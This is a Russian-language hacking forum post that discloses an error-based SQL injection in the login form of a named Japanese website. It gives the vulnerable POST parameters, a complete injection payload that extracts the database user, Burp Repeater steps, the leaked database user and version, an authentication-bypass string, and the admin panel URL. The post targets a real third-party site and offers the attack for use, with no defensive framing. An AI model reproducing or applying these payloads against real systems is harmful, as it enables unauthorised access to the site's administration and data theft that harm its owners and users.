17.05.2017, 00:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
14926
Репутация:
17
|
|
Сайт: rakuraku-home.jp
SQLi Error base через POST
queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
Уязвимые параметры account и password
В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
эксплоит:
Код:
Code:
URL:http://www.rakuraku-home.jp/system/login/login.php
POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
вход в админку логин и пароль 1' or '1
Админка:
Код:
Code:
http://www.rakuraku-home.jp/system/
|
|
|
|